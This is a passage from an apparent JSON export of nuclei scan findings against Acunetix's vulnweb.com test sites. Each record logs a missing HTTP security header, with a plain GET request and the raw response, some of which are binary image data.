!�x�⎵�\u0005�^�c�\u0013hR\u000eO��,Ř�\\�9ZZ��1��du\tU\u001b�$�>�����3h�j��\u0015�\fdp]\u0002'���\u0019S���8\u0004k@�ė��q\\n۪�\u0019e�Y\u001d�QZF$�\u000e\t��'?3\u000f\u0007\u001aZZAZ��\u0018�\f\u001e>���d����z��\u001b?Kt�[��~k\u000b�U������j1�`\r���\u001f�`\n1#,x\u0007KKU\u0016�L\u001cG|��O^>0\u0017���S$K;�����6bU\u0001bH\u0003<d��\u0016P�r�\u0018�\u001aZZmnF\bJn��aL.����RQ�Ϩl�5\u000f"�S_\u0005;��kly\u0002�\u000f�\u0007Ζ���$S���\u0003B\u0001��U_\r�puWX��wf��&\f�,m���-��\u0002F\u000e9ǂ5�X�d��\u000e��鈒�A\u0014i\u0014O�,\u000b\u0014;���ң��Ϝaik�{@���\t��\n���N�%��IGE\u0005������\u0018鷡U%�\t\\�\fĐ���\u0007�A9ڸ1�J����ui_RgM�Yʾ\u000fv#��r}M�?1�x��֩>*Fqk���9�E��T�5L��\u001bܖ8\u0018\u0019Ή�\u0016��A�6x�j��\u0013ԤNar��\u0010\b�A������w\u000f\u000f�\u0011�:�\u0007�hi\u001a�4��)�nW\n�i�a$B\u0002E6\u001dP�\u0003��d���i\u0005���D�T�(�\u0019\u000b�\u000br�P��@��\u001f�KK\\�W��X3տ�՟#�VY���C\u001d\u0002�v;�U��\f�HwaDn���1������m��VR�\u0013;,Ԑ�6�\u000e\u0019�$\u000e<iij���LM\u0005.��+��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 983, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "discovered_date": "2024-11-13T02:42:43.105Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/8.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4139\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nEtag: "4dca64a1-102b"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0003\u0004\u0005\u0001\u0007\b��;\u0010\u0001\u0003\u0002\u0004\u0002\u0006\b\u0005\u0004\u0002\u0003\u0001\u0002\u0003\u0011\u0004\u0005\u0012!1AQ\u0006\u0013"aq�\u00142T�����$B���\u0015#3�Rb4r���\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007��(\u0011\u0002\u0001\u0003\u0003\u0004\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011!\u0004\u00141\u0005\u0012AQ\u0013\u0015"B2ab���\f\u0003\u0001\u0002\u0011\u0003\u0011?�S�K��@�\u001bU\u0010z�~\u001d*D���@e��\u0012+�oQ��Vߩ�}I�����{9%L�Oy\u0014ÃX�z�?��h�"2��0\u000f�5ޤѺ�\u000bU��Z|\f���vv�����\u0003)����i��R���Eã�o�t\u001f\u0014\nc�5�uB�\u000fq����\u001b���t�H�)�l\u0007�� N\u0015{\u001e�\u0003�U]�7\u0012`�\tM��aT��h�k�-&\u001el)=�\u0002�F\u0013k��\u0018���W6��$��S��u�\u000ey�eQ��\u0015�I9g��\u0017�0$�\u0015��56\f�m��#�����N�Oq�����Ʋh|���I/2\u001a,-���$w\u001d~uE�[ ������V�����"<�H�\f��;�\u0015R+.A��G.F\u0018K\u0003vTڞ�e\u0013��>�\u0002p\u0007`�_�:�\u0018\u0002�0A�ދ�C�\\!�\u001eJ�����\n�H�U+Z�wQkXBS�m�\u0014װ�3B�Ȏ\u0019������+J7�\t��hI���\u0016j\u0003�G΋��{C?\u0018�\u0013`6�d��3�=s��`��(�ȟ3�����\u001b'��wཥ��W\u0005�M|b��\u001fW<ظ\u0007�\t�\u0015Q�����\u001e%?J3�\u000f�����[\u000e7\f�b�օt� 3�.\u0006���趹\u001f����FYl=���R�a�\f�B���YO�\u001f���C_:i��ײ��FY,=���R�a�\f�b���YO�\u0012�\u0007�e@Gq�Յ�&G���[\u000fhg�\u0014�X{C?\u0018��\u0019t� \u00118j�\u0012�\u0011�jSa;2G�\u0013F�,=���Rɇ�C?\u0018��#��`8�ZOe$yԨ�RwfO2h�%��3��Yp�hg�\u00147�}6��\u0010\f(��\u001esK��De\u0003�Q�\u0016#k�~1K�^���(oE��~��0����OvSL\u00188V�\bO�@��{K_\u0018�E��埌Q�1�NH�\u001c��� M������\u0013���;W$�ӷ�\r�\rZ�$;m�c(\n�T\u0001�I�4��~��Ņ�׽z\u0016�\u0014 \u0001�E�$�xk\u001bl8p�ϨR�\b�\u001d-Ŵ;���L!��V\u0016�\u0002�+�\u0003��\u001f|�u��b\bk�.:�\b�LƁZ�Ѓ�X���h/���.B�eH))!! H�!;lg�0▪E�}P}�(���)#(%[\u001d���YWQ�J�.���]��b/\u0007\u0002\u001cs�@P$����M����\u0012�SM�^\u000e-A\t܉�G\u0018�\u0016��o\u001crԼ�E�u�+*���F�.���V��˶�\u001a��-#+�7\u0004J\u0013�a\u001a� ��\u0002$M\tu\u0019���;e��Yx�(�6\u001c�!\u0004�Y���\u000e����b��\fN�\u0019E�n��#�m��9���H1�\u001f��ڠ��Ɉ���[j\u0015�!�0��\u0003\u0007�&"\u000e�j)�8��Iq�f��}��\b\n'|����Y+7r�J\u0017�7�I�U~�����Gajȩ�>`x��Ķ��8��6�]:P�FE�+*Q�\u0012F�\u00065\u0010�Tq�C\u0007yƔ��\u0010��\u0011�=��\u0019'�y�v�l�p�_\fqn+�]����$q\u001eQ�?\u001aYW����\u000fd}\u001a��q7\u0015��۔��\u0004��\t\u0002\u000f\u00025\u001ae\u001cF���8�$�\u0016��\\C\u0004f��2�\b�\u001a�5\u0011���\u0002��î[�KL�խh%N\u0013�h�\u0004�\u001c\u0001o:�d[�]�Y\\��бd�W(\u0005��\u0003S�\t�\u0013��Ũ�{�\u0013�<X4��1\u000b��,ߘ\u0004���\u0012��<9H��4�X��\r�p]Y�\u0003�\u0019"7�Q�\u0015�/�ww�u,\\:۩�\b�*ˤ�7\u0018���o�����`k�\u001a]��mEJ%Dd��"gS���\u0013�=\n�he��1%J/\u0016\u000bn�Q�۾�\u001fq�<م$�j�=.�R�/�S�hO\u000e�\u0012�$��������Ze'e\r9@�֯�ݦ'���\u0012P\u0014�\u001c���se��\u0003A��jZ�����-4�Y\u001bk����r�TBGorv\u001bӏK���}I\u0003i\\��7��0���T�\u00044�k�\u001d�$��;N\u0013vm\u0014���ܘ�Gw\u0012|\u0006��������\u0005�\n�.�p�t����r�皤\u001d0�*���\u001d�SC\u0016WV�o�9�|��C���J���C"4���\u0013R�v�.��\u0019�\u001bG��VHL\u0002\u0006i�\u0006����ޒ]B\nV�\u0019i�l�β�F\u0012\u001ce���Ќ�@\u000e�>\u0014��\u0016�YԄ�ⳒN�����x�\u0016�u���\u0010BB�\u001c�T���\u001c7�4.����x�(�V\bB3��6�غ��/�\u0012îu��$�W]@�����\u0016�a͵�4\u0014\u001a�\u001ey�\n@�'��\f�\u0004F��\u000e\u001a�{���ܦ�(��Fl���*ݻ*��T\u0014����Q�*\u0007�\u0006i�"���\u0010�t���!qw��ݷ�>�\t�cI\u0011��Y�[\u00168��-\u0015t�>��P�ҳ\u0015&`(�\u001a��üP-���1��H\u001dA=��ӕ\u0016٭�p�mՙ�tR\u0002���\u000f�w���8G)\u0007�K�]N4�Wn�\u0010�\u0003,�\fs\u0007]�3"^HPK�F�H\u001a�p�oDNa]K�2��HP\b��y�}��U�,57=Z�n��1\u0019c�����U�\u0016\u0001c\n͉�\u0016���U��\b��Jں��j���\u000e��B\u000bn%3\u0005�F�{ֵ�\u001bl\bB\u0019lI��))H��\u0003a�\u001d��S\\�n\u001dYm$+)�刐 �\f\r�����u'��0��Ҝ�i!JP�,L�\u0001\u001aL��\u001fJ�|�,p�KRB^t\u0005����h;�j�Ͳ�ԧs��H�V��m�\u0001�����C8�,�!���;�bg:�\u0004�5�\u0018\u001a��.�\u001e����[�\u0002oqE�\u0013n��R\u001a �\u0002x}k�z\u0011�3��\nn��9n\u0002V�$���Q׈\u0002I܃�y& �\\�T��F�L@\u001e\u0002���^\u001e�k�u���D\u0018��+�^��\u0004�\u0019\u0013�Y�\u0015��\u001b[莩�ħi�\u000f�:���c�<\u000b�6\u0014d�*$����L��]�\tm����\u0002\u000e�R��b���)& ������q�@��]���U��2r�)L�����,=�ш\u000b�”�܅(\t��\u0015�\u0004�?:1w\u0017��ZP��%\t�`(���D��.� �q��!��Q���Y�w+��\u0012�,)X�a`6�\u0018��*x�1\u0014K�Z��\u0007�z�,��HS\u0004�)\u0006\f�G\u0001 ���\u0018��ıD���*ԭZ7��\u0015��\\=\t’�R-���\u0010]�h��]~T��e(Ő\u0005�p���\u0004\u0003�\u001a�*+2kZ�\u0015ZD\u0014\b�YB9V�p\u0002L�Ԥ��IWn��\u0016��m&@��L�37\u001a��RX)YЂ)�� \tN\u001eop�/�R��\u000eGF�DhF�6:�M2ѻ�[��\u0001SZ\u0012�Ǻ�C�Akv��Q\r�\u0018:�H��D*]�U�H\n�II\u0013\u001bH\u001e\u0015�nQn-`(����G\u0010�\u0013�v��\u000e����5a\u0017�D����u���x�\by���\u0002#��\u001bT��J�z�\u0007Q��c_�Y%L(%o\u0010hu�7\tZb\u0012�"u��H�Tn\\�ܽVT\u0015+�\n�\u0012\u000e��X�踸jє�\u001a�~�뫺ZD���c0\u0004\u001f�W�d.��Iq3m`��c9\u0019\u001bo��Y>C���-�%���d����'X'�O��[��n�ajNl��\u0001������f�:V��ʄ'a�km$�\u001e��S\u0002�y�\u0015\u0003A�_€a�.�\u0001�!#���J�I�N�����g �Guk�q`\u0010��-�/1\n'y��/4�25\u0006x�\u0014��\u0010u�\u001ba�`%:�G\u00045�3j��H8��\u0004��PU�'¶1|=~��[Z\u0003-���:�y���\u001d\u0012e-\u0002�$�� \rD�υ[�R�c\r-)!\u000f9�W08\b�|�\u0014�7VȄX&(ղ�s\u0002\b%*�\u001fޝ�\\e\u0018��Wn���O>:���&�\n\u001c$fȭ��@�\u0002� (F�)�˽Ir\u0017$�٣qg\n��\u0019�\u001b����T�\f\u001f�\u001c�6�����(��'.i�׉�����ʙ�;q��S���FRM�J�R\t�\u001b�\u001fÊ�*���0EJ���� \u000eU�\u0002�\tY�䟥[w�\n�Ӑ�P��W\t5��6�\u0001eAGI\u001a\u0011�UD)eq$�w�|�VR\u0012�\b�t"L�Ƅ��\t�ڛ��L�s\u001e4�|��\u0001\u0001�\u0001���J�2�G7*����&\u000e�\nT��<\u0012����vaCj����*p��\u001b�#�TEڒ������M\u000f=�B�'bi�)?\u00029�y-�.V���\u0004�́���]�:�\u0015��4����rgi֚�\u001f��U��:xҚ\u0007�\u0012�p�У�S�\rj�M���\u0006�x\u0011�R�O�uQ<�Y�\u0014��J�O}3�Q�懲\u0015�ҖH\u0003��L٥e!*�xD�a\t#:\t���J�\u0010��\u001c��&*�)"�(ˆ\u0014aL\u000b\u001bR��\u001a�\u0010A(<x��P�J�Uqrd�5#6�'�Z\r::��\u0010L�sN���"��w��²z�m*�4�7&\u0016gp5=��R��*A�P����h��ي�ՙ�*%i@$�`i�k!�!S\u001a�|�ҥ\\�\u000e��$\u0014�\u0002t�j\u00022�@m R�W�1f̤�����\u0017�\u0012��p��J�\bԵ(�cz������iR�PV�\f�y%m���\u001fqS%\u00031\u001e?*T�>E\u0011\u00039\u0011�>�j�\t�>�R�Q\u0001�N�\u0014�z�@ޕ*Ҹ2ˑ�\u00026\u001bTKBH:R�Q�\u001c[I))\u0012\u0007q�LI\u0001\u000f\u00109q�J���j��4���P��\\P\u0011=��Uf���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 984, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:42:43.381Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 985, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19", + "discovered_date": "2024-11-13T02:42:43.714Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests/pmwiki_2_1_19 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/pmwiki_2_1_19/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/pmwiki_2_1_19/</h1><hr><pre><a href="../">../</a>\r\n<a href="scripts/">scripts/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 986, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg.tn", + "discovered_date": "2024-11-13T02:42:44.005Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/5.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4428\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:12 GMT\r\nEtag: "4dca64a1-114c"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0003\u0001\u0001\u0001\u0004\u0002\u0003\u0005\u0001\u0007\u0006��2\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0004\u0006\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011\u0004\u0012!1AQ\u0013"\u00052aq\u0006\u0014#B����R�\u0015b�r��\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006\u0007��/\u0011\u0001\u0003\u0002\u0005\u0001\u0007\u0004\u0002\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0013Qaq����"���\u0006�\u00142���\f\u0003\u0001\u0002\u0011\u0003\u0011?�\u001a�d�������0�V\u0015��gQ�%XmƲ ��Tg6�ru�Ʋ0��G\n>2y��d�EV\u0019m}3�1��<*������qY\u0016`��d��6�k"�w��r�{0�qY.��\u0019*>3��F\u001e\u0013u�\f�\u000f\u0018�Du2i��h.�H�2��\t\u0019^Ӗ�.z*�J��\u001d\u0014\u0002�@2ء\u0012\t\u0018=�+\u0012T\u00176.�-��EcZA\u0012,�*�!\t\u0003o\u0007�:�<��x����Fh�u�'\u000b\b6\u0001&�\u0003��\f4\r�|�Ӽ�@\u0005��>[$LL\r2Ѡ���\u0019ƈ���Ӆ�����\u0007�=N��2<t�R�*Xr�r�\u001d8?+\u000b�#2H��1�\u0012D�ሠ\u0006�6�9\u0006�o�}�\u0001`ֻV�V\f���./c�Y�p��4�z\u000fH�\u0011V\n��\u001b��u�\u0012)X\u0005�n��:��aU\u0004��\r?�?�\b�\rm^�����\r}��\nF�\u0019��I\u0004J�\u0015:�\u0003�d�?��SϬ��$!�j\u0004�6�_�_\u001fk�\r\\��UM4�(\b\u0016\u0017$����t���x$\u000e\u0019\u0003q�#ʚ�>�+\u001a9�3�;V��8��c��Lz\u0007Ӽ�6�53�\u0012�eZ8\t4\u0018���J�\u001c\u000e��4�@��M��1���\u0005EF�r9*H�(qV\u000b���,�q��������m��%� �\u0006�B�p�\u0004�1b\u0010��j9$�}?���,[M���\u0001\u001b�kQ\u001dױ�`�+l�iqf����Ww�%+\u0018���]���$�p/8󿡣�@���r�E�k\u001d�6<�\b��c\u0006�IYX���/�q��R:\u0018�5\n^%e\u001eǐ�\u0007��U}��<��&��R��)\u0012H��\r���<�9�&�W�I6�?a?9���!�uR��51>�\u000e��\u001e\u001dDl-8;ā����6\u000f?B\u001b\\n�jꧠ��q~c��i����$SH�\u00132L�@�W�*ё�f�z��+��m9���\u0014�b*��V�Z4o���V��\u001a�ٷJʭ�H�����\u000ex��\u001b�(��%�;+��U0��XKo���hi�\r4~��~`��(b»�z׎����h@`���6�eGݶ��V\b�\u0005�ʦ���6���\r�;�\u001d\t�@��s�C\u0014r�R3\u001f��2\t\u0014i���TG�:\u0010\b���B�'�(\\e�p� |�R�.�\u000b���t\u0005��\u0002C��7\u0016���"����8�\u0007M�E$,�&\u0014\u000e�<�\u0007��\u001d\t�4�JҼ�~��9jC,d�ف\u001c\u0001�;�]�\u0007kZ߇��P��\u0015�2�(k��/�\u0011�M���:�d�N�����林ԝ�CpX��8�/�\u0016<�\u001c�8������'�kkb�u\u0011G/�^O�T\u0014x�}Gׯ�Š�sJ\u0015�e\n�w�ZW�\r\u001e/�W{]{\u0005��UQ22]a}{�>]OK��F�*D&�7;��{��Q\u0010���C�P�G����v(\u0001��O8�ZWi��\u0001i#4֥A�ш��sW]��\u0013$�4N\u001fiV�n�\u0006\u001c��\u0010~��9#\u0001:\u0015F�H\u0003���\u0001��S���"��A%��x��\u000fw5���\u0003*�\u0003\u0016�IY�HY\u001byqE@��5��o�۾��\u0012(U_dP�V4-)$�J,�l�"��ךˌ\r,pƞ�s���\u00197B��-�C�m��\u000f\u0016\r��B�f�\u001b\u0014����\u001fE�ڄ����18��\u001d��UoU��"�оؤӳ0\u0006�p3cT����#�5\r$6x�\u0010z�&ʶ�Th\u001a#�V-\u0002j\u0002\u0015\u0005\t��\t\u0014M_#�\u001b�\u0005\u001e/+�óJ���F���%�K��R�F�*�2����~��hi�%d�4�Ez�\u0015BG�\u0006�5`t�\u0003�������*��I�\u000eù�9<e��@����xԊfQVv�@�]��xÂ��zI��c�\u0005u�A#*:�B\u0003Q�M\u0003G�DgSB���ޑ3����Z��\u0001�y\u0001�t錬\n�$��]\u0001\u0004�ˎ�x�\t��Y�\u0002��:d\u001a�A\u0010�f�\u001c�-�{�-tv݁���V2�.W5Y�\u0018\u000bKέ��,yt蓕�U��fP�[o�]\u0001aۥu'\u0011\u0012)��+\u0017ݹ\u001c8*\b,\b�{w\u0007���I�]\u0013Țy�\u0012eYD�C!dV\u001e�\t5�A�\u0002��\u000eT�B}k��1�2�K\u001f\u0014��.k\\30��F.ڗ\bݭ�}�j�,o�[\u0013\u001b\u001c�\u001a�<Qʂ�ov]�`�n��\u0012mH��^�古T�|r��]�\u0002O\u0015�u'�\u001c���������$�\u00166�rgK��]��\u0019����:�\n_;��}�\r�j\u0010�����sn�N�]��뷋��L�L�E\u0014Q�Wolq�v\u0002�/h#ڶ;��rT\u001b����1X�{I{@��d��d�\u000fóG�D�j�(Ν��\tm\u001f1a@��r7X\r^E�@�t�!�U�+\u001bI��GP\u0019�\nwn��\u0010\u000f\u001b�b\u000fZ 